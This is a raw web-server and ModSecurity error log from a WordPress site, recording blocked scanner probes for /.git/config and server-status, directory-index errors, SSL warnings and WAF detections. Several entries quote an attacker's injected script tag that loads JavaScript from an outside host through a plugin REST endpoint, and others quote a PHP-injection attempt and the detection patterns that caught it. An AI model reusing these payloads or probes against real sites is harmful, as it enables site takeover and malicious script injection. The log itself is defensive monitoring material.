[authz_core:error] [pid 21786:tid 140551353476864] [client 64.226.65.160:54780] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/12 09:41:54 [error] 21742#21742: *237488 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Sep 12 23:59:51.827082 2024] [autoindex:error] [pid 21786:tid 140551445796608] [client 4.240.116.219:48200] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Sep 13 00:00:08.599586 2024] [autoindex:error] [pid 18646:tid 140551454189312] [client 4.240.116.219:48220] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Sep 13 03:38:47.856892 2024] [autoindex:error] [pid 21785:tid 140551445796608] [client 85.239.239.114:53660] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Sep 13 03:38:58.640125 2024] [autoindex:error] [pid 18646:tid 140551545120512] [client 85.239.239.114:53680] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Sep 13 03:39:00.271959 2024] [autoindex:error] [pid 22458:tid 140551420618496] [client 85.239.239.114:53684] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Sep 13 03:41:38.815748 2024] [ssl:warn] [pid 21092:tid 139779794962304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 13 03:41:39.133166 2024] [ssl:warn] [pid 21093:tid 139779794962304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 13 03:41:39.698316 2024] [ssl:warn] [pid 21093:tid 139779794962304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 13 03:41:41.529671 2024] [ssl:warn] [pid 21093:tid 139779794962304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 13 03:41:43.796016 2024] [ssl:warn] [pid 21510:tid 140499928622976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 13 03:41:43.989933 2024] [ssl:warn] [pid 21511:tid 140499928622976] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 13 05:13:04.706468 2024] [autoindex:error] [pid 22150:tid 140499737483008] [client 128.199.30.174:54798] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Sep 13 15:49:23.271556 2024] [:error] [pid 21528:tid 140499553826560] [client 179.43.191.19:42546] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZuSlU0kR9AFlJkIrF8cH2wAAAA4"], referer: https://investigacionperu.com [Fri Sep 13 23:42:45.746522 2024] [autoindex:error] [pid 21530:tid 140499537041152] [client 52.170.199.63:53340] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Sep 14 00:17:53.981790 2024] [authz_core:error] [pid 22150:tid 140499562219264] [client 64.227.70.2:54914] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/14 00:17:59 [error] 21492#21492: *266505 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Sep 14 03:22:35.463429 2024] [ssl:warn] [pid 21858:tid 139998036531072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 14 03:22:35.702138 2024] [ssl:warn] [pid 21859:tid 139998036531072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 14 03:22:36.193328 2024] [ssl:warn] [pid 21859:tid 139998036531072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 14 03:22:38.846350 2024] [ssl:warn] [pid 21859:tid 139998036531072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 14 03:22:41.169508 2024] [ssl:warn] [pid 22280:tid 139927326361472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 14 03:22:41.403342 2024] [ssl:warn] [pid 22281:tid 139927326361472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 14 03:22:42.208265 2024] [ssl:warn] [pid 22281:tid 139927326361472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Sep 14 08:55:16.364727 2024] [authz_core:error] [pid 22435:tid 139926989424384] [client 139.162.101.202:36078] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/14 08:55:21 [error] 22398#22398: *271897 access forbidden by rule, client: 139.162.101.202, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Sep 14 14:44:38.050602 2024] [autoindex:error] [pid 23107:tid 139926939068160] [client 143.244.142.166:45900] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Sep 14 21:55:26.359774 2024] [:error] [pid 22433:tid 139927093257984] [client 78.153.140.224:52318] [client 78.153.140.224] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/.config"] [unique_id "ZuZMnhF9Wf73JhjBTywF9wAAAAY"] [Sat Sep 14 21:55:59.488754 2024] [:error] [pid 23107:tid 139926905497344] [client 78.153.140.224:52338] [client 78.153.140.224] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/.config"] [unique_id "ZuZMv5St0ZkE0brK_K5aEgAAANQ"] [Sat Sep 14 21:56:26.984779 2024] [:error] [pid 23107:tid 139926913890048] [client 78.153.140.224:52364] [client 78.153.140.224] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/.config"] [unique_id "ZuZM2pSt0ZkE0brK_K5aFgAAANM"] [Sun Sep 15 03:12:39.968898 2024] [ssl:warn] [pid 13308:tid 140044105115520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 15 03:12:40.268753 2024] [ssl:warn] [pid 13309:tid 140044105115520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 15 03:12:40.897091 2024] [ssl:warn] [pid 13309:tid 140044105115520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 15 03:12:42.751271 2024] [ssl:warn] [pid 13309:tid 140044105115520] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 15 03:12:45.126103 2024] [ssl:warn] [pid 13727:tid 140098236606336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 15 03:12:45.373573 2024] [ssl:warn] [pid 13728:tid 140098236606336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Sep 15 07:28:48.366720 2024] [:error] [pid 13995:tid 140097890522880] [client 20.79.181.135:59340] [client 20.79.181.135] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "ZubTAPXcLWV1CqdwXxoQkAAAAMs"] [Mon Sep 16 03:22:19.056044 2024] [authz_core:error] [pid 13750:tid 140098045466368] [client 164.92.244.132:53990] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/16 03:22:23 [error] 13710#13710: *299302 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Sep 16 03:36:42.788192 2024] [ssl:warn] [pid 6355:tid 139981194946432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 16 03:36:43.165101 2024] [ssl:warn] [pid 6356:tid 139981194946432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 16 03:36:43.846585 2024] [ssl:warn] [pid 6356:tid 139981194946432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 16 03:36:47.273919 2024] [ssl:warn] [pid 6356:tid 139981194946432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 16 03:36:49.857202 2024] [ssl:warn] [pid 6800:tid 140360374224768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 16 03:36:50.208121 2024] [ssl:warn] [pid 6803:tid 140360374224768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 16 07:52:07.309960 2024] [:error] [pid 12584:tid 140359958996736] [client 51.15.184.67:58646] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Mon Sep 16 07:52:07.310095 2024] [:error] [pid 12584:tid 140359958996736] [client 51.15.184.67:58646] Stack trace: [Mon Sep 16 07:52:07.310113 2024] [:error] [pid 12584:tid 140359958996736] [client 51.15.184.67:58646] #0 {main} [Mon Sep 16 07:52:07.310255 2024] [:error] [pid 12584:tid 140359958996736] [client 51.15.184.67:58646] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Mon Sep 16 08:05:26.339036 2024] [:error] [pid 6823:tid 140359967389440] [client 179.43.191.19:58866] [client 179.43.191.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZugtFlPjM5Z2PWAKWsL6owAAABI"], referer: https://investigacionperu.com [Mon Sep 16 08:28:33.101546 2024] [autoindex:error] [pid 6825:tid 140360068101888] [client 52.140.79.166:59274] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Sep 16 10:21:30.326389 2024] [authz_core:error] [pid 12713:tid 140359917033216] [client 68.183.180.73:43864] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/16 10:21:37 [error] 6782#6782: *306840 access forbidden by rule, client: 68.183.180.73, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Tue Sep 17 03:47:45.221260 2024] [ssl:warn] [pid 11887:tid 140632403728256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 17 03:47:45.502805 2024] [ssl:warn] [pid 11888:tid 140632403728256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 17 03:47:46.104454 2024] [ssl:warn] [pid 11888:tid 140632403728256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 17 03:47:49.120539 2024] [ssl:warn] [pid 11888:tid 140632403728256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 17 03:47:51.419671 2024] [ssl:warn] [pid 12309:tid 140070891718528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 17 03:47:51.662676 2024] [ssl:warn] [pid 12311:tid 140070891718528] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 17 22:46:12.639892 2024] [authz_core:error] [pid 12331:tid 140070442931968] [client 206.81.24.74:37928] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/17 22:46:17 [error] 12289#12289: *331114 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Sep 18 01:49:20.683956 2024] [autoindex:error] [pid 12331:tid 140070585607936] [client 144.126.144.83:41310] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 18 01:49:35.803578 2024] [autoindex:error] [pid 13116:tid 140070602393344] [client 144.126.144.83:41326] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 18 01:49:39.420089 2024] [autoindex:error] [pid 12330:tid 140070442931968] [client 144.126.144.83:41330] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 18 03:21:40.121053 2024] [ssl:warn] [pid 11628:tid 139822053070720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 18 03:21:40.390710 2024] [ssl:warn] [pid 11631:tid 139822053070720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 18 03:21:40.888220 2024] [ssl:warn] [pid 11631:tid 139822053070720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 18 03:21:43.813465 2024] [ssl:warn] [pid 11631:tid 139822053070720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 18 03:21:46.258493 2024] [ssl:warn] [pid 12047:tid 140254873802624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 18 03:21:46.557254 2024] [ssl:warn] [pid 12048:tid 140254873802624] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 18 08:54:34.454377 2024] [authz_core:error] [pid 13550:tid 140254564574976] [client 139.59.143.102:48330] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/18 08:54:39 [error] 12028#12028: *337276 access forbidden by rule, client: 139.59.143.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 18 19:06:07.562034 2024] [autoindex:error] [pid 13550:tid 140254649091840] [client 143.244.142.166:36128] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/09/18 22:18:13 [error] 12027#12027: *346865 access forbidden by rule, client: 44.200.237.239, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/18 22:55:48 [error] 12027#12027: *347272 access forbidden by rule, client: 44.200.237.239, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Sep 19 03:50:37.420602 2024] [ssl:warn] [pid 27959:tid 139626805802880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 19 03:50:37.769137 2024] [ssl:warn] [pid 27960:tid 139626805802880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 19 03:50:38.439631 2024] [ssl:warn] [pid 27960:tid 139626805802880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 19 03:50:41.262159 2024] [ssl:warn] [pid 27960:tid 139626805802880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 19 03:50:43.602921 2024] [ssl:warn] [pid 28373:tid 140395173169024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 19 03:50:43.963079 2024] [ssl:warn] [pid 28374:tid 140395173169024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 19 15:23:21.137077 2024] [:error] [pid 29586:tid 140394897602304] [client 144.126.128.225:46642] [client 144.126.128.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZuyIOcu_r6BChmEX-1kKXwAAAMM"], referer: www.google.com [Thu Sep 19 15:23:27.496254 2024] [:error] [pid 29586:tid 140394864031488] [client 144.126.128.225:46648] [client 144.126.128.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZuyIP8u_r6BChmEX-1kKYQAAAMc"], referer: www.google.com [Fri Sep 20 00:29:26.481111 2024] [authz_core:error] [pid 28396:tid 140394780104448] [client 159.89.17.243:58820] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/20 00:29:31 [error] 28356#28356: *354947 access forbidden by rule, client: 159.89.17.243, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Sep 20 03:22:36.809115 2024] [ssl:warn] [pid 28076:tid 140303829796736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 20 03:22:37.065312 2024] [ssl:warn] [pid 28077:tid 140303829796736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 20 03:22:37.697558 2024] [ssl:warn] [pid 28077:tid 140303829796736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 20 03:22:40.831783 2024] [ssl:warn] [pid 28077:tid 140303829796736] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 20 03:22:43.225326 2024] [ssl:warn] [pid 28496:tid 139814045009792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 20 03:22:43.517379 2024] [ssl:warn] [pid 28497:tid 139814045009792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 20 04:26:02.733645 2024] [:error] [pid 28514:tid 139813837084416] [client 144.126.128.225:34256] [client 144.126.128.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match 